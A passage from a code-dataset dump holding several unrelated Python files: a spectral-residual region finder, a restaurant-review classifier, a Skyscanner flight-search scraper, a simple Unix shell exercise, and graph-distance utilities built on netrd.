argparse.ArgumentParser(prog=\"regions.py\", description=\"Identify region zones.\")\nparser.add_argument(\"file\", help=\"JSON file containing the data, model, and residual.\")\nparser.add_argument(\"--sigma\", type=float, default=4.0, help=\"Sigma clipping threshold.\")\nparser.add_argument(\"--sigma0\", type=float, default=2.0, help=\"How close (in AA) regions are allowed to be next to each other.\")\nargs = parser.parse_args()\n\nimport Starfish\nimport json\nimport numpy as np\nfrom astropy.stats import sigma_clip\nfrom operator import itemgetter\n\nf = open(args.file, \"r\")\nread = json.load(f) # read is a dictionary\nf.close()\n\nwl = np.array(read[\"wl\"])\n# data = np.array(read[\"data\"])\n# model = np.array(read[\"model\"])\nresiduals = np.array(read[\"resid\"])\nspectrum_id = read[\"spectrum_id\"]\norder = read[\"order\"]\n\n# array that specifies if a pixel is already covered.\n# to start, it should be all False\ncovered = np.zeros((len(wl),), dtype='bool')\n\n# #average all of the spectra in the deque together\n# residual_array = np.array(self.resid_deque)\n# if len(self.resid_deque) == 0:\n# raise RuntimeError(\"No residual spectra stored yet.\")\n# else:\n# residuals = np.average(residual_array, axis=0)\n\n# run the sigma_clip algorithm until converged, and we've identified the outliers\nfiltered_data = sigma_clip(residuals, sig=args.sigma, iters=None)\nmask = filtered_data.mask\n\n# sigma0 = config['region_priors']['sigma0']\n# logAmp = config[\"region_params\"][\"logAmp\"]\n# sigma = config[\"region_params\"][\"sigma\"]\n\n# Sort in decreasing strength of residual\nnregions = 0\nmus = []\n\nfor w, resid in sorted(zip(wl[mask], np.abs(residuals[mask])), key=itemgetter(1), reverse=True):\n if w in wl[covered]:\n continue\n else:\n # check to make sure region is not *right* at the edge of the echelle order\n if w <= np.min(wl) or w >= np.max(wl):\n continue\n else:\n # instantiate region and update coverage\n\n # Default amp and sigma values\n mus.append(w) # for evaluating the mu prior\n nregions += 1\n\n # determine the stretch of wl covered by this new region\n ind = (wl >= (w - args.sigma0)) & (wl <= (w + args.sigma0))\n # update the covered regions\n covered = covered | ind\n\n# Save the mu's to file.\nmy_dict = {\"mus\":sorted(mus), \"spectrum_id\":spectrum_id, \"order\":order}\nfname = Starfish.specfmt.format(spectrum_id, order) + \"regions.json\"\nf = open(fname, 'w')\njson.dump(my_dict, f, indent=2, sort_keys=True)\nf.close()\n","sub_path":"scripts/regions.py","file_name":"regions.py","file_ext":"py","file_size_in_byte":2566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"159275388","text":"import re, nltk, pickle, argparse\nimport os, sys\nimport data_helper\nimport features\n\n\nfrom sklearn import svm\nfrom sklearn.naive_bayes import GaussianNB, BernoulliNB\nimport sklearn, numpy\nimport pandas as pd\nimport random\nfrom sklearn import tree\nfrom nltk.classify import SklearnClassifier\n\n\n\n\nDATA_DIR = \"data\"\n\nrandom.seed(10)\n\n\nMODEL_DIR = \"models/\"\nOUTPUT_DIR = \"output/\"\nFEATURES_DIR = \"features/\"\n\ndef select_features(classifier):\n best = (0.0, 16384)\n best_features = classifier.most_informative_features(10000)\n \n selected_features = set([fname for fname, value in best_features[:best[1]]])\n temp_train,dis = build_features(\"train_examples.tsv\",\"word_features\")\n train_data = []\n for rev in temp_train:\n temp_dic={}\n for key,value in rev[0].items():\n if key in selected_features:\n temp_dic.update({key:value}) \n train_data.append((temp_dic,rev[1]))\n classifier = nltk.NaiveBayesClassifier.train(train_data)\n #write_features_category(train_data, \"save_feat.txt\")\n return classifier\n\ndef build_features(data_file, feat_name, save_feats=None):\n # read text data\n positive_texts, negative_texts = data_helper.get_reviews(os.path.join(DATA_DIR, data_file))\n\n category_texts = {\"positive\": positive_texts, \"negative\": negative_texts}\n\n # build features\n features_category_tuples, texts = features.get_features_category_tuples(category_texts, feat_name)\n\n # save features to file\n #if save_feats is not None:\n # features_category_tuples = select_features(features_category_tuples)\n # write_features_category(features_category_tuples, save_feats)\n\n return features_category_tuples, texts\n#def get_sel_feat(file):\n\n\ndef train_model(model):\n train_data=\"train_examples.tsv\"\n feat_file=\"data/save_feat.txt\"\n f = open(feat_file, 'r')\n l = f.readlines()\n feats=[]\n for line in l:\n #print(line)\n sent_r = r\"([^\\s]+)\"\n dic_r= r\"\\{([^}]+)\\}\"\n key_r=r\"([^\\s]+)\"\n sent = re.findall(sent_r, line)[0]\n #print(sent)\n dic = re.findall(dic_r,line)[0]\n dic = dic[0:len(dic)]\n # print(dic)\n dic_list = dic.split(\",\")\n #print(dic_list)\n feat_dic = {}\n for stuff in dic_list:\n pair = re.findall(key_r,stuff)\n key = pair[0][1:len(pair[0])-2]\n val = pair[1]\n #print(key+\":\"+val)\n feat_dic.update({key:int(val)})\n feats.append((feat_dic,sent))\n #print(feats)\n model.train(feats)\n return model\ndef get_we_feat(file):\n feat,text=build_features(file,\"word_features\")\n feat_list = []\n i=0\n for rev in text:\n\n w2v_feat=features.get_word_embedding_features(rev)\n feat_list.append((w2v_feat,feat[i][1]))\n i+=1\n return feat_list,text\n\ndef train_word_embem_model(model):\n train_data=\"train_examples.tsv\"\n feat_list,throw_out=get_we_feat(train_data)\n model.train(feat_list)\n return model\ndef build_classifier(classifier_name):\n \"\"\"\n Accepted names: nb, dt, svm, sk_nb, sk_dt, sk_svm\n\n svm and sk_svm will return the same type of classifier.\n\n :param classifier_name:\n :return:\n \"\"\"\n if classifier_name == \"nb\":\n cls = nltk.classify.NaiveBayesClassifier\n elif classifier_name == \"nb_sk\":\n cls = SklearnClassifier(BernoulliNB())\n elif classifier_name == \"dt\":\n cls = nltk.classify.DecisionTreeClassifier\n elif classifier_name == \"dt_sk\":\n cls = SklearnClassifier(tree.DecisionTreeClassifier())\n elif classifier_name == \"svm_sk\" or classifier_name == \"svm\":\n cls = SklearnClassifier(svm.SVC())\n else:\n assert False, \"unknown classifier name:{}; known names: nb, dt, svm, nb_sk, dt_sk, svm_sk\".format(classifier_name)\n\n return cls\n\n\ndef evaluate(classifier, features_category_tuples, reference_text, data_set_name=None):\n\n # test on the data\n accuracy = nltk.classify.accuracy(classifier, features_category_tuples)\n\n\n #accuracy_results_file = open(\"{}_results.txt\".format(data_set_name), 'w', encoding='utf-8')\n #accuracy_results_file.write('Results of {}:\\n\\n'.format(data_set_name))\n #accuracy_results_file.write(\"{0:10s} {1:8.5f}\\n\\n\".format(\"Accuracy\", accuracy))\n\n features_only = []\n reference_labels = []\n for feature_vectors, category in features_category_tuples:\n features_only.append(feature_vectors)\n reference_labels.append(category)\n\n predicted_labels = classifier.classify_many(features_only)\n\n confusion_matrix = nltk.ConfusionMatrix(reference_labels, predicted_labels)\n\n #accuracy_results_file.write(str(confusion_matrix))\n #accuracy_results_file.write('\\n\\n')\n #accuracy_results_file.close()\n\n #predict_results_file = open(\"{}_output.txt\".format(data_set_name), 'w', encoding='utf-8')\n #for reference, predicted, text in zip(\n # reference_labels,\n # predicted_labels,\n # reference_text\n #):\n # if reference != predicted:\n # predict_results_file.write(\"{0} {1}\\n{2}\\n\\n\".format(reference, predicted, text))\n #predict_results_file.close()\n\n return accuracy, confusion_matrix\n\ndef main(reviews,output):\n model=build_classifier(\"svm\")\n model = train_word_embem_model(model)\n file = open(output,\"w+\")\n dev_data = \"dev_examples.tsv\"\n dev_feats,dev_text= get_we_feat(dev_data)\n #print(dev_feats)\n acc, cm = evaluate(model,dev_feats,dev_text)\n dir_list = os.listdir(path)\n for d in dir_list:\n file_list = os.listdir(path+d)\n for f in file_list:\n texts= data_helper.get_reviews(os.path.join(path,d,f))\n \n for text in texts:\n w2v_feat=features.get_word_embedding_features(text) \n file.write(model.classify(w2v_feat)+ \" \"+text+\"\\n\")\n \n\n\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='Assignment 3')\n parser.add_argument('-r', dest=\"reviews\", default=None, required=False,\n help='The file with the reviews in it to be classified.')\n parser.add_argument('-p', dest=\"pred_file\", default=\"predictions.txt\", required=False,\n help='The file to write predictions to.')\n\n args = parser.parse_args()\n main(args.reviews, args.pred_file)\n","sub_path":"CS143/asg4/restaurant-competition-P2.py","file_name":"restaurant-competition-P2.py","file_ext":"py","file_size_in_byte":6344,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"241412047","text":"import math\nimport time\nimport requests\nfrom selenium import webdriver\nfrom bs4 import BeautifulSoup\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nimport pymysql\nfrom selenium.webdriver.chrome.options import Options\n\nmain_url = \"https://www.skyscanner.co.kr/\"\nkeyword = \"오사카\"\n\noptions = Options()\noptions.add_argument('--no-sandbox') # Bypass OS security model\ndriver = webdriver.Chrome(chrome_options=options, executable_path=r'C:\\driver/chromedriver.exe')\ndriver.get(main_url)\ndriver.implicitly_wait(10)\n\n# 편도 클릭\n\none_way = driver.find_element_by_id(\"fsc-trip-type-selector-one-way\")\none_way.click()\ntime.sleep(3)\n\ndestination = driver.find_element_by_css_selector(\"#destination-fsc-search\")\ndestination.clear()\n\ndestination.send_keys(keyword)\n\n\ntime.sleep(3)\nstart_day = driver.find_element_by_css_selector(\"#depart-fsc-datepicker-button\")\nstart_day.click()\n\n\n# 출발 날짜 클릭\ntime.sleep(3)\nstart = driver.find_element_by_css_selector(\"#depart-fsc-datepicker-button\")\nstart.click()\n\n#달력에서 동그라미쳐진 날짜 클릭\ntime.sleep(3)\nstart_day = driver.find_element_by_css_selector(\"#depart-fsc-datepicker-popover > div > div > div.fsc-datepicker__container-3azq_ > div > table > tbody > tr:nth-child(3) > td:nth-child(5) > button\")\nstart_day.click()\n# '직항만' 체크\ntime.sleep(3)\ncheck_non_stop = driver.find_element_by_css_selector(\"div.SingleDestControls-2wsUo > label > input\")\ncheck_non_stop.click()\n\n# 항공권 검색 클릭\ntime.sleep(2)\nsearch = driver.find_element_by_css_selector(\"#flights-search-controls-root > div > div > form > div:nth-child(3) > button\")\nsearch.click()","sub_path":"craw_skyscanner.py","file_name":"craw_skyscanner.py","file_ext":"py","file_size_in_byte":1742,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"809056","text":"#! /usr/bin/env python3\n#Author: Ethan Benckwitz\nimport os, sys, re\n\ndef main(commands):\n if commands[0] == \"exit\": #exit program\n sys.exit(1)\n elif not commands: #no user input will go through loop again\n return\n elif \"|\" in commands: #check for pipe command\n pipe_command(commands)\n elif commands[0] == \"cd\": #change directories\n directory = commands[1]\n try:\n if len(commands) < 2:\n os.write(2, (\"Provide a directory\\n\").encode())\n elif len(commands) > 2:\n os.write(2, (\"Too much!\\n\").encode()) \n else:\n os.chdir(directory)\n except FileNotFoundError:\n os.write(2, (\"File not found! Please try again!\\n\").encode())\n else: #run shell\n my_shell(commands)\n\ndef my_shell(command):\n pid = os.getpid()\n rc = os.fork()\n args = command\n waiting = True\n if \"&\" in command:\n waiting = False\n command.remove(\"&\")\n\n if rc < 0:\n os.write(2, (\"Fork failed, returning %d\\n\" % rc).encode())\n sys.exit(1)\n\n elif rc == 0: #child\n if \">\" in args:\n redirect = command.index(\">\")\n os.close(1)\n os.open(command[redirect - 1], os.O_CREAT | os.O_WRONLY)\n os.set_inheritable(1, True)\n exec_command(command[0:redirect])\n\n elif \"<\" in args:\n redirect = command.index(\"<\")\n os.close(0)\n os.open(command[redirect + 1], os.O_RDONLY)\n os.set_inheritable(0, True)\n exec_command(command[0:redirect])\n\n elif \"/\" in args: #path names\n program = args[0]\n try:\n os.execve(program, args, os.environ)\n except FileNotFoundError:\n pass\n \n else: exec_command(args)\n\n else:\n if waiting: #background task\n result = os.wait()\n\ndef pipe_command(command):\n pipe = command.index(\"|\")\n \n pr, pw = os.pipe()\n for f in (pr, pw):\n os.set_inheritable(f, True)\n \n rc = os.fork()\n if rc < 0:\n os.write(2, (\"Fork failed, returning %d\\n\" % rc).encode())\n sys.exit(1)\n\n elif rc == 0:\n os.close(1) #redirect child's stdout\n os.dup(pw)\n os.set_inheritable(1, True)\n for fd in (pr, pw):\n os.close(fd)\n exec_command(command[0:pipe])\n os.write(2,(\"%s command not found\"%args[0]).encode())\n sys.exit(1)\n \n else:\n os.close(0)\n os.dup(pr)\n os.set_inheritable(0, True)\n for fd in (pw, pr):\n os.close(fd)\n if \"|\" in command[pipe + 1:]: #second pipe\n pipe_command(command[pipe + 1:])\n exec_command(command[pipe + 1:])\n os.write(2,(\"%s command not found\"%args[0]).encode())\n sys.exit(1)\n \ndef exec_command(args):\n for dir in re.split(\":\", os.environ['PATH']): #try each directory in the path\n program = \"%s/%s\" % (dir, args[0])\n try:\n os.execve(program, args, os.environ) #try to exec program\n except FileNotFoundError: #this is expected\n pass #fail quietly\n \n os.write(2, (\"Command %s not found. Try again.\\n\" % args[0]).encode())\n sys.exit(1) #terminate with error\n\nif __name__ == '__main__':\n while True:\n if 'PS1' in os.environ:\n os.write(1, (os.environ['PS1']).encode())\n else:\n os.write(1, (\"$ \").encode())\n try:\n command = os.read(0, 1024)\n except EOFError:\n sys.exit(1)\n except ValueError:\n sys.exit(1)\n\n \n if len(command) == 0: break\n command = command.decode().split(\"\\n\")\n for arg in command:\n main(arg.split())\n\n","sub_path":"shell/shell.py","file_name":"shell.py","file_ext":"py","file_size_in_byte":4000,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"348059294","text":"import networkx as nx\nimport netrd\nfrom netrd.utilities import entropy, ensure_undirected\nimport numpy as np\nimport pandas as pd\nimport community # install with \"pip install python-louvain\"\nimport cmocean as cmo\nfrom collections import defaultdict\nfrom collections import Counter\nimport scipy as sp\nimport scipy.sparse as sparse\nimport math\nfrom ortools.linear_solver import pywraplp\nimport matplotlib.pyplot as plt\nimport glob\nimport itertools\n\nfrom concurrent.futures import ProcessPoolExecutor, as_completed #for multiprocessing\n\nfrom netrd.distance import PortraitDivergence\nfrom netrd.distance import OnionDivergence\nfrom netrd.distance import DistributionalNBD\nfrom netrd.distance import NetSimile\nfrom netrd.distance import PolynomialDissimilarity\nfrom netrd.distance import CommunicabilityJSD\nfrom netrd.distance import ResistancePerturbation\nfrom netrd.distance import QuantumJSD\nfrom netrd.distance import DeltaCon\nfrom netrd.distance import HammingIpsenMikhailov\nfrom netrd.distance import IpsenMikhailov\nfrom netrd.distance import LaplacianSpectral\nfrom netrd.distance import JaccardDistance\nfrom netrd.distance import DegreeDivergence\nfrom netrd.distance import Frobenius\nfrom netrd.distance import Hamming\nfrom netrd.distance import NetLSD\nfrom netrd.distance import DMeasure\n#from netrd.distance import ResilienceDistance\n\n#from extra_distances import *\n\n\n\ndef LJ(G1, G2):\n D = netrd.distance.LaplacianSpectral()\n d = D.dist(G1, G2, kernel='lorentzian')\n return d\n\n\ndef LE(G1, G2):\n D = netrd.distance.LaplacianSpectral()\n d = D.dist(G1, G2, kernel='lorentzian', measure='euclidean')\n return d\n\n\ndef NJ(G1, G2):\n D = netrd.distance.LaplacianSpectral()\n d = D.dist(G1, G2)\n return d\n\n\ndef NE(G1, G2):\n D = netrd.distance.LaplacianSpectral()\n d = D.dist(G1, G2, measure='euclidean')\n return d\n\ndef dk3Distance():\n \"\"\"\n \n \"\"\"\n\n return\n\n\ndef euclidean_distance(x, y):\n return math.sqrt(sum((a - b)**2 for (a, b) in zip(x, y)))\n\n\ndef nbvals(graph, topk='automatic', batch=100, tol=1e-5):\n \"\"\"Compute the largest-magnitude non-backtracking eigenvalues.\n\n Parameters\n ----------\n\n graph (nx.Graph): The graph.\n\n topk (int or 'automatic'): The number of eigenvalues to compute. The\n maximum number of eigenvalues that can be computed is 2*n - 4, where n\n is the number of nodes in graph. All the other eigenvalues are equal\n to +-1. If 'automatic', return all eigenvalues whose magnitude is\n larger than the square root of the largest eigenvalue.\n\n batch (int): If topk is 'automatic', compute this many eigenvalues at a\n time until the condition is met. Must be at most 2*n - 4; default 100.\n\n tol (float): Numerical tolerance. Default 1e-5.\n\n Returns\n -------\n\n An array with the eigenvalues.\n\n \"\"\"\n if not isinstance(topk, str) and topk < 1:\n return np.array([[], []])\n\n # The eigenvalues are left untouched by removing the nodes of degree 1.\n # Moreover, removing them makes the computations faster. This\n # 'shaving' leaves us with the 2-core of the graph.\n core = shave(graph)\n matrix = pseudo_hashimoto(core)\n if not isinstance(topk, str) and topk > matrix.shape[0] - 1:\n topk = matrix.shape[0] - 2\n print('Computing only {} eigenvalues'.format(topk))\n\n if topk == 'automatic':\n batch = min(batch, 2 * graph.order() - 4)\n if 2 * graph.order() - 4 < batch:\n print('Using batch size {}'.format(batch))\n topk = batch\n\n N = matrix.shape[0]\n v0 = np.ones(N) / N\n eigs = lambda k: sparse.linalg.eigs(\n matrix, k=k, v0=v0, return_eigenvectors=False, tol=tol\n )\n\n count = 1\n while True:\n vals = eigs(topk * count)\n largest = np.sqrt(abs(max(vals, key=abs)))\n if abs(vals[0]) <= largest or topk != 'automatic':\n break\n count += 1\n if topk == 'automatic':\n vals = vals[abs(vals) > largest]\n\n # The eigenvalues are returned in no particular order, which may yield\n # different feature vectors for the same graph. For example, if a\n # graph has a + ib and a - ib as eigenvalues, the eigenvalue solver may\n # return [..., a + ib, a - ib, ...] in one call and [..., a - ib, a +\n # ib, ...] in another call. To avoid this, we sort the eigenvalues\n # first by absolute value, then by real part, then by imaginary part.\n vals = sorted(vals, key=lambda x: x.imag)\n vals = sorted(vals, key=lambda x: x.real)\n vals = np.array(sorted(vals, key=np.linalg.norm))\n\n # Return eigenvalues as a 2D array, with one row per eigenvalue, and\n # each row containing the real and imaginary parts separately.\n vals = np.array([(z.real, z.imag) for z in vals])\n return vals\n\n\ndef shave(graph):\n \"\"\"Return the 2-core of a graph.\n\n Iteratively remove the nodes of degree 0 or 1, until all nodes have\n degree at least 2.\n\n \"\"\"\n core = graph.copy()\n while True:\n to_remove = [node for node, neighbors in core.adj.items()\n if len(neighbors) < 2]\n core.remove_nodes_from(to_remove)\n if len(to_remove) == 0:\n break\n return core\n\n\ndef pseudo_hashimoto(graph):\n \"\"\"Return the pseudo-Hashimoto matrix.\n\n The pseudo Hashimoto matrix of a graph is the block matrix defined as\n B' = [0 D-I]\n [-I A ]\n\n Where D is the degree-diagonal matrix, I is the identity matrix and A\n is the adjacency matrix. The eigenvalues of B' are always eigenvalues\n of B, the non-backtracking or Hashimoto matrix.\n\n Parameters\n ----------\n\n graph (nx.Graph): A NetworkX graph object.\n\n Returns\n -------\n\n A sparse matrix in csr format.\n\n \"\"\"\n # Note: the rows of nx.adjacency_matrix(graph) are in the same order as\n # the list returned by graph.nodes().\n degrees = graph.degree()\n degrees = sparse.diags([degrees[n] for n in graph.nodes()])\n adj = nx.adjacency_matrix(graph)\n ident = sparse.eye(graph.order())\n pseudo = sparse.bmat([[None, degrees - ident], [-ident, adj]])\n return pseudo.asformat('csr')\n\n\ndef half_incidence(graph, ordering='blocks', return_ordering=False):\n \"\"\"Return the 'half-incidence' matrices of the graph.\n\n If the graph has n nodes and m *undirected* edges, then the\n half-incidence matrices are two matrices, P and Q, with n rows and 2m\n columns. That is, there is one row for each node, and one column for\n each *directed* edge. For P, the entry at (n, e) is equal to 1 if node\n n is the source (or tail) of edge e, and 0 otherwise. For Q, the entry\n at (n, e) is equal to 1 if node n is the target (or head) of edge e,\n and 0 otherwise.\n\n Parameters\n ----------\n\n graph (nx.Graph): The graph.\n\n ordering (str): If 'blocks' (default), the two columns corresponding to\n the i'th edge are placed at i and i+m. That is, choose an arbitarry\n direction for each edge in the graph. The first m columns correspond\n to this orientation, while the latter m columns correspond to the\n reversed orientation. Columns are sorted following graph.edges(). If\n 'consecutive', the first two columns correspond to the two orientations\n of the first edge, the third and fourth row are the two orientations of\n the second edge, and so on. In general, the two columns for the i'th\n edge are placed at 2i and 2i+1.\n\n return_ordering (bool): if True, return a function that maps an edge id\n to the column placement. That is, if ordering=='blocks', return the\n function lambda x: (x, m+x), if ordering=='consecutive', return the\n function lambda x: (2*x, 2*x + 1). If False, return None.\n\n\n Returns\n -------\n\n P (sparse matrix), Q (sparse matrix), ordering (function or None).\n\n\n Notes\n -----\n\n The nodes in graph must be labeled by consecutive integers starting at\n 0. This function always returns three values, regardless of the value\n of return_ordering.\n\n \"\"\"\n numnodes = graph.order()\n numedges = graph.size()\n\n if ordering == 'blocks':\n src_pairs = lambda i, u, v: [(u, i), (v, numedges + i)]\n tgt_pairs = lambda i, u, v: [(v, i), (u, numedges + i)]\n if ordering == 'consecutive':\n src_pairs = lambda i, u, v: [(u, 2 * i), (v, 2 * i + 1)]\n tgt_pairs = lambda i, u, v: [(v, 2 * i), (u, 2 * i + 1)]\n\n def make_coo(make_pairs):\n \"\"\"Make a sparse 0-1 matrix.\n\n The returned matrix has a positive entry at each coordinate pair\n returned by make_pairs, for all (idx, node1, node2) edge triples.\n\n \"\"\"\n coords = list(\n zip(\n *(\n pair\n for idx, (node1, node2) in enumerate(graph.edges())\n for pair in make_pairs(idx, node1, node2)\n )\n )\n )\n data = np.ones(2 * graph.size())\n return sparse.coo_matrix((data, coords), shape=(numnodes, 2*numedges))\n\n src = make_coo(src_pairs).asformat('csr')\n tgt = make_coo(tgt_pairs).asformat('csr')\n\n if return_ordering:\n if ordering == 'blocks':\n func = lambda x: (x, numedges + x)\n else:\n func = lambda x: (2 * x, 2 * x + 1)\n return src, tgt, func\n else:\n return src, tgt\n\n\n\ndef NonBacktrackingSpectral(G1, G2, topk='automatic', batch=100, tol=1e-5):\n \"\"\"Non-Backtracking Distance between two graphs.\n\n Parameters\n ----------\n\n G1, G2 (nx.Graph)\n The graphs to compare.\n\n topk (int or 'automatic')\n The number of eigenvalues to compute. If `'automatic'` (default),\n use only the eigenvalues that are larger than the square root\n of the largest eigenvalue. Note this may yield different\n number of eigenvalues for each graph.\n\n batch (int)\n If topk is `'automatic'`, this is the number of eigenvalues to\n compute each time until the condition is met. Default\n :math:`100`.\n\n tol (float)\n Numerical tolerance when computing eigenvalues.\n\n Returns\n -------\n float\n The distance between `G1` and `G2`\n\n \"\"\"\n vals1 = nbvals(G1, topk, batch, tol)\n vals2 = nbvals(G2, topk, batch, tol)\n\n vals1 = [tuple(vals1[i]) for i in range(len(vals1))]\n vals2 = [tuple(vals2[i]) for i in range(len(vals2))]\n\n dist = earthmover_distance(vals1, vals2)\n\n return dist\n\n\ndef earthmover_distance(p1, p2):\n '''\n Output the Earthmover distance between the two given points.\n Arguments:\n - p1: an iterable of hashable iterables of numbers (i.e., list of tuples)\n - p2: an iterable of hashable iterables of numbers (i.e., list of tuples)\n '''\n dist1 = {x: count / len(p1) for (x, count) in Counter(p1).items()}\n dist2 = {x: count / len(p2) for (x, count) in Counter(p2).items()}\n solver = pywraplp.Solver('earthmover_distance',\n pywraplp.Solver.GLOP_LINEAR_PROGRAMMING)\n\n variables = dict()\n\n # for each pile in dist1, constraint says all the dirt must leave this pile\n dirt_leaving_constraints = defaultdict(lambda: 0)\n\n # for each hole in dist2, constraint says this hole must be filled\n dirt_filling_constraints = defaultdict(lambda: 0)\n\n # the objective\n objective = solver.Objective()\n objective.SetMinimization()\n\n for (x, dirt_at_x) in dist1.items():\n for (y, capacity_of_y) in dist2.items():\n amount_to_move_x_y = solver.NumVar(0,\n solver.infinity(),\n 'z_{%s, %s}' % (x, y))\n variables[(x, y)] = amount_to_move_x_y\n dirt_leaving_constraints[x] += amount_to_move_x_y\n dirt_filling_constraints[y] += amount_to_move_x_y\n objective.SetCoefficient(amount_to_move_x_y,\n sp.spatial.distance.euclidean(x, y))\n\n for x, linear_combination in dirt_leaving_constraints.items():\n solver.Add(linear_combination == dist1[x])\n\n for y, linear_combination in dirt_filling_constraints.items():\n solver.Add(linear_combination == dist2[y])\n\n status = solver.Solve()\n if status not in [solver.OPTIMAL, solver.FEASIBLE]:\n raise Exception('Unable to find feasible solution')\n\n for ((x, y), variable) in variables.items():\n if variable.solution_value() != 0:\n cost = euclidean_distance(x, y) * variable.solution_value()\n\n return objective.Value()\n\ndef matusita_dist(X, Y):\n r\"\"\"\n Return the Matusita distance between two vectors, $X$ and $Y$\n $$\n \\sqrt{\\sum_i \\sum_j \\left( \\sqrt{X_{ij}} - \\sqrt{Y_{ij}} \\right)^{2}}\n $$\n\n Params\n ------\n X (np.ndarray): the first vector to compare\n Y (np.ndarray): the second vector to compare\n\n Returns\n -------\n d (float): the Matusita distance between X and Y\n\n \"\"\"\n return np.sqrt(np.sum(np.square(np.sqrt(X) - np.sqrt(Y))))\n\ndef dk2Distance(G1, G2):\n r\"\"\"Compute the distance between two graphs by using the Jensen-Shannon\n divergence between the :math:`2k`-series of the graphs.\n The :math:`dk`-series of a graph is the collection of distributions of\n size :math:`d` subgraphs, where nodes are labelled by degrees. For\n simplicity, we consider only the :math:`2k`-series, i.e., the\n distribution of edges between nodes of degree :math:`(k_i, k_j)`. The\n distance between these :math:`2k`-series is calculated using the\n Jensen-Shannon divergence.\n Parameters\n ----------\n G1, G2 (nx.Graph)\n two networkx graphs to be compared\n Returns\n -------\n dist (float)\n the distance between `G1` and `G2`.\n References\n ----------\n .. [1] Orsini, Chiara, Marija M. Dankulov, Pol Colomer-de-Simon,\n Almerima Jamakovic, Priya Mahadevan, Amin Vahdat, Kevin E.\n Bassler, et al. 2015. Quantifying Randomness in Real Networks.\n Nature Communications 6 (1). https://doi.org/10.1038/ncomms9627.\n \"\"\"\n\n def dk2_series(G):\n \"\"\"\n Calculate the 2k-series (i.e. the number of edges between\n degree-labelled edges) for G.\n \"\"\"\n\n k_dict = dict(nx.degree(G))\n dk2 = defaultdict(int)\n\n for (i, j) in G.edges:\n k_i = k_dict[i]\n k_j = k_dict[j]\n if k_i <= k_j:\n dk2[(k_i, k_j)] += 1\n else:\n dk2[(k_j, k_i)] += 1\n\n # every edge should be counted once\n assert sum(list(dk2.values())) == G.size()\n\n return dk2\n\n G1 = ensure_undirected(G1)\n G2 = ensure_undirected(G2)\n\n G1_dk = dk2_series(G1)\n G2_dk = dk2_series(G2)\n\n N = max(len(G1), len(G2))\n\n # note N^2 dense matrices \n D1 = np.zeros((N, N))\n D2 = np.zeros((N, N))\n\n for (i, j), k in G1_dk.items():\n D1[i, j] = k\n for (i, j), k in G2_dk.items():\n D2[i, j] = k\n\n # these should be normalized by the number of edges\n D1 = D1 / G1.size()\n D2 = D2 / G2.size()\n\n # flatten matrices. this is safe because we've padded to the same size\n G1_dk_normed = D1[np.triu_indices(N)].ravel()\n G2_dk_normed = D2[np.triu_indices(N)].ravel()\n\n assert np.isclose(G1_dk_normed.sum(), 1)\n assert np.isclose(G2_dk_normed.sum(), 1)\n\n dist = entropy.js_divergence(G1_dk_normed, G2_dk_normed)\n# self.results[\"dist\"] = dist\n\n return dist\n\n\ndef get_entropies(handle):\n for fn in glob.glob('/media/recnodes/recnode_2mfish/*' + handle +'*'):\n ret, pf = stims.sync_data(pd.read_pickle(fn+'track/perframe_stats.pickle'), stims.get_logfile(slashdir(fn)), imgstore.new_for_filename(slashdir(fn) + 'metadata.yaml'))\n \n # FINISH ME PLEASE\n return \n \n \ndef check_networks(G, ideal_size=150, min_index=1):\n\n missing = [str(x) for x in list(set(list(range(min_index,ideal_size+min_index))) - set(list([int(x) for x in G.nodes()])))]\n if len(missing) > 0:\n for i in missing:\n G.add_edge(i, np.random.choice(G.nodes()))\n \n while not nx.is_connected(G):\n minG = str(min([int(x) for x in [*nx.connected_components(G)][0]]))\n maxG = str(max([int(x) for x in [*nx.connected_components(G)][0]]))\n #minG = min(nx.connected_components(G), key=len)\n #maxG = max(nx.connected_components(G), key=len)\n rand_i = np.random.choice(list(minG))\n rand_j = np.random.choice(list(maxG))\n G.add_edge(rand_i,rand_j)\n \n return G \n\ndef s_entropy(freq_list):\n ''' This function computes the shannon entropy of a given frequency distribution.\n USAGE: shannon_entropy(freq_list)\n ARGS: freq_list = Numeric vector represnting the frequency distribution\n OUTPUT: A numeric value representing shannon's entropy'''\n freq_list = [element for element in freq_list if element != 0]\n sh_entropy = 0.0\n for freq in freq_list:\n sh_entropy += freq * np.log(freq)\n sh_entropy = -sh_entropy\n return(sh_entropy)\n\ndef ordinal_patterns(ts, embdim, embdelay):\n ''' This function computes the ordinal patterns of a time series\n for a given embedding dimension and embedding delay.\n USAGE: ordinal_patterns(ts, embdim, embdelay)\n ARGS: ts = Numeric vector represnting the time series,\n embdim = embedding dimension (3<=embdim<=7 prefered range), embdelay = embdding delay\n OUPTUT: A numeric vector representing frequencies of ordinal patterns'''\n time_series = ts\n possible_permutations = list(itertools.permutations(range(embdim)))\n lst = list()\n for i in range(len(time_series) - embdelay * (embdim - 1)):\n sorted_index_array = list(np.argsort(time_series[i:(embdim+i)]))\n lst.append(sorted_index_array)\n lst = np.array(lst)\n element, freq = np.unique(lst, return_counts = True, axis = 0)\n freq = list(freq)\n if len(freq) != len(possible_permutations):\n for i in range(len(possible_permutations)-len(freq)):\n freq.append(0)\n return(freq)\n else:\n return(freq)\n\ndef p_entropy(op):\n ordinal_pat = op\n max_entropy = np.log(len(ordinal_pat))\n p = np.divide(np.array(ordinal_pat), float(sum(ordinal_pat)))\n return(s_entropy(p)/max_entropy)\n\ndef complexity(op):\n ''' \n This function computes the complexity of a time series\n defined as: Comp_JS = Q_o * JSdivergence * pe\n Q_o = Normalizing constant\n JSdivergence = Jensen-Shannon divergence\n pe = permutation entopry\n ARGS: ordinal pattern\n '''\n pe = p_entropy(op)\n constant1 = (0.5+((1 - 0.5)/len(op)))* np.log(0.5+((1 - 0.5)/len(op)))\n constant2 = ((1 - 0.5)/len(op))*np.log((1 - 0.5)/len(op))*(len(op) - 1)\n constant3 = 0.5*np.log(len(op))\n Q_o = -1/(constant1+constant2+constant3)\n\n temp_op_prob = 